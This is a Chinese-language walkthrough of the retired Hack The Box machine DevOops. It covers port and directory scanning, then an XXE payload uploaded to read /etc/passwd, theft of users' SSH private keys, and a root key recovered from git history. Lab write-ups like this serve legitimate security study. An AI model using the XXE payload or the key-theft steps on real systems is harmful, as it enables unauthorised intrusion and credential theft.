HTB-靶机-DevOops

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.91

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.91 -o ./DevOops-autorecon

看到开放了5000的web应用端口,访问看看

没发现啥东西,跑跑目录看看

gobuster dir -u http://10.10.10.91:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 400 -x php,jsp,txt -o bmfx-devoops-gobuster

爆破出来一个目录upload访问下

看上面显示带XML的,猜测可能存在XXE攻击,通过构造下面的XXE攻击代码

<?xml version="1.0"?>
  <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >
  ]>
  <feed>
    <Author>Gerh</Author>
    <Subject>BinaryChaos</Subject>
    <Content>&xxe;</Content>
  </feed>

上传之后通过burpsuite进行重放请求

看到了 3个普通用户,分别是osboxes,roosa,blogfeed 都尝试读取这些用户的id_rsa,经过测试最终得到如下

使用此密钥给其400权限然后远程ssh登录

通过遍历当前目录下的各个文件,发现发现一处密钥信息

使用此密钥登录root用户,发现不能正常登录,猜测可能不是root的私钥,使用git stash保存下当前工作进度,具体如下操作:

 

到了上述实际是可以直接复制上述得到的密钥去掉前面每行的所有”+“即可,但是我这还是想把写入到文件中,自动剔除+号

最终成功使用ssh登录root用户

posted @ 2020-12-09 15:25  皇帽讲绿帽带法技巧  阅读(123)  评论(0编辑  收藏  举报